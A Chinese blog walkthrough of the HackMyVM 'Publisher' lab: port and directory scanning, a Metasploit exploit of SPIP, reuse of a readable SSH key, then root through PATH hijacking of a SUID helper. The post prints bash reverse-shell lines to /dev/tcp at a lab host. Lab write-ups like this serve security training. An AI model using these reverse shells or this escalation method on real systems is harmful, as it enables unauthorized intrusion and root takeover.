Publisher - hackmyvm

最新推荐文章于 2024-08-02 19:38:03 发布
最新推荐文章于 2024-08-02 19:38:03 发布
阅读量397 收藏 6
点赞数 3
分类专栏: hackmyvm靶场合集 文章标签: 安全 服务器 网络 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/140853445
版权

简介

靶机名称:Publisher

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Publisher

本地环境

虚拟机:vitual box

靶场IP(Publisher):192.168.56.123

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(kali):192.168.190.131

扫描

nmap有点慢,fscan先探路

fscan -h 192.168.56.123 -nobr -p "1-65535"

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.56.123:22 open
192.168.56.123:110 open
192.168.56.123:80 open
192.168.56.123:25 open

没有22还是挺意外的。

HTTP

spip服务

image-20240625101055756

路径扫描一下,发现主要服务布置在/spip/路径下

feroxbuster -u http://192.168.56.123/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt  -C 500

image-20240625101921573

image-20240625102014244

msf中找到poc,直接打

image-20240625102513225

think用户目录下有user.txt

fa229046d44eda6a3598c73ad96f4ca5

image-20240625104849073

提权

我们对think的ssh私钥有读取权限。直接拉下来,ssh登陆上去

image-20240625105202089

ssh think@192.168.56.123 -i ./id_rsa

image-20240625105237079

值得一提的是,think用户执行linpeas识别不到容器环境,也无法在根目录找到.dockerenv文件夹,但是www-data用户就可以……除此之外think还有大大小小的限制,少见的web用户还能比普通用户权限更高

image-20240625110248546

image-20240625121530830

查看SUID权限,发现有一个run_container可以用

find / -perm -u=s -type f 2>/dev/null

image-20240625125311620

无法运行,但至少可读。拉下来看一下

image-20240722145102157

总之就是会执行一下/opt/run_container.sh这个脚本文件。很神奇我们连查看权限都没有,但就是能执行。

image-20240722145339178

image-20240722153555483

不知道ID的话,就重新进入www-data用户,查/etc/hosts

image-20240722170813931

41c976e507f8

​ 随便输入的话,还会看到有一个对脚本16行的报错。因为缺失这个命令,我们可以尝试通过PATH进行劫持。

image-20240722171501476

think@publisher:/tmp$ touch  validate_container_id
think@publisher:/tmp$ vim validate_container_id
think@publisher:/tmp$ cat validate_container_id
bash -i &>/dev/tcp/192.168.56.1/30000 <&1
think@publisher:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
think@publisher:/tmp$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp

然后就发现我们对run_container.sh有完全的控制权了

image-20240729203310658

往run_container.sh中写入提权命令,然后执行bash -p即可

think@publisher:/opt$ cat run_container.sh
cat run_container.sh
#!/bin/bash
bash -c "bash -i >& /dev/tcp/192.168.56.1/40000 0>&1"
think@publisher:/opt$ /usr/sbin/run_container
/usr/sbin/run_container
think@publisher:/opt$ bash -p
bash -p
bash-5.0# id
id
uid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)
bash-5.0# cat /root/root.txt
cat /root/root.txt
3a4225cc9e85709adda6ef55d6a4f2ca

over

后记

还是有点疑惑的,/usr/sbin/run_container 的SUID是root,但是通过它执行反弹shell却仍然是think用户。

除此之外,可以从一些痕迹看出来我们拿到的shell是受限shell,但并不是很明确其是如何实现对think用户无法访问opt文件夹的限制。感觉就是很神奇。

古明地核
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
joint_state_publisher-发布
02-11
joint_state_publisher(foxy)-2.2.0-1 通过在Thu, 04 Jun 2020 12:49:34 -0000日Thu, 04 Jun 2020 12:49:34 -0000运行/usr/bin/bloom-release --rosdistro foxy --track foxy joint_state_publisher ,将joint_...
Smart Publisher-开源
05-03
**Smart Publisher 开源详解** `Smart Publisher` 是一个开源的Web应用程序,它的主要功能是协助用户在互联网上发布静态和动态网站。作为一个高效且便捷的工具,它简化了网站管理和更新的过程,尤其对于那些需要...
publisher-confirm-type 与 publisher-confirm
weixin_44371237的博客
04-03 2425
https://blog.csdn.net/yaomingyang/article/details/108410286
RabbitMQ学习笔记:mandatory、publisher-confirms、publisher-return属性区别
OceanSky的专栏
06-19 1万+
rabbitmq客户端发送消息首先发送的交换器exchange,然后通过路由键routingKey和bindingKey比较判定需要将消息发送到那个队列queue上;在这个过程有两个地方消息可能丢失,第一消息发送到交换器exchange的过程,第二消息从交换器exchange发送到队列queue的过程; 1.publiser-confirm模式可以确保生产者到交换器exchange消息有没有发送成功 #设置此属性配置可以确保消息成功发送到交换器 spring.rabbitmq.publisher-con.
rabbitmq中spring.rabbitmq.publisher-confirm-type详解
进击的豌豆的博客
10-14 2490
rabbitmq中spring.rabbitmq.publisher-confirm-type详解
springboot rabbitmq属性配置spring.rabbitmq.publisher-confirm和spring.rabbitmq.publisher-confirm-type详解
热门推荐
OceanSky的专栏
09-04 1万+
在springboot2.2.0.RELEASE版本之前是amqp正式支持的属性,用来配置消息发送到交换器之后是否触发回调方法,在2.2.0及之后该属性过期使用spring.rabbitmq.publisher-confirm-type属性配置代替,用来配置更多的确认类型; 1.spring.rabbitmq.publisher-confirm发布确认属性配置 如果该属性为true,则会触发以下方法: /** * 设置生产者消息publish-confirm回调函数 .
RabbitMQ 的配置文件 publisher-confirms=true 报错
qq_45620825的博客
03-23 3040
publisher-confirms=true 报错 在配置文件里 定义rabbitmq connectionFactory 时,里面publisher-confirm报红 解决 :新版本confirm-type="CORRELATED"代替了旧版本publisher-confirm=“true”
rabbitmq配置文件字段spring.rabbitmq.publisher-confirms过时
m0_66557301的博客
03-23 2967
这里写自定义目录标题 spring.rabbitmq.publisher-confirms过时解决 spring.rabbitmq.publisher-confirms过时解决 在properties文件中确认消息报红 因为源码中过时配置级别设置了Error 新版本jar包配置换了就可以了 spring.rabbitmq.publisher-confirm-type=correlated ...
spring.rabbitmq.publisher-confirm属性配置过时处理
脉脉情缘的博客
02-21 1961
spring.rabbitmq.publisher-confirm在springboot2.2.0.RELEASE版本之前是amqp正式支持的属性,用来配置消息发送到交换器之后是否触发回调方法,在2.2.0及之后使用spring.rabbitmq.publisher-confirm-type属性配置代替,用来配置更多的确认类型
ROS无法下载ros-kinetic-joint-state-publisher-gui方法
m0_46442326的博客
11-12 687
ROS无法下载ros-kinetic-joint-state-publisher-gui方法
RabbitMQ配置之mandatory,publisher-returns相关
z69183787的专栏
11-01 1521
在SpringBoot的RabbitMQ配置中,有如下一项:spring.rabbitmq.template.mandatory = true 官方注释: Enable mandatory messages. If a mandatory message cannot be routed to a queue by the server, it will return an unroutable message with a Return method. 大意为:开启强制消息投递(mandator
electron-publisher-nucleus
03-13
在项目中,你可能会遇到 `electron-publisher-nucleus-main` 这个文件或模块,它是 Electron Publisher Nucleus 的主要实现部分,包含了上述功能的代码实现。如果你需要自定义或扩展其功能,可能需要直接操作或修改...
Open Publisher-开源
04-24
在"open-publisher-1.0a"这个压缩包中,用户可以找到Open Publisher的初始版本源代码。安装和部署过程中,开发者通常需要按照官方文档的指示配置服务器环境,包括PHP5和MySql的安装,然后将源代码上传至服务器并进行...
Panda Publisher-开源
05-15
Panda Publisher是一款开源的网站发布系统,旨在提供一种简单、高效的方式来运营和管理网站内容。它的设计理念强调轻量化、快速响应、遵循Web标准,并且注重元数据的丰富性,以提高网站的SEO优化和用户体验。这款...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 483
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 448
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 224
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
鸿蒙系统开发【ASN.1密文转换】安全
最新发布
2301_76813281的博客
08-02 252
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
publisher-confirm-type
03-16
publisher-confirm-type是AMQP协议中的一种确认类型,用于确认消息是否已被发布者接收。当publisher-confirm-type被设置为true时,发布者将会收到一个确认消息,表示消息已被成功接收。这种确认类型可以保证消息的可靠性,确保消息不会丢失或重复发送。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值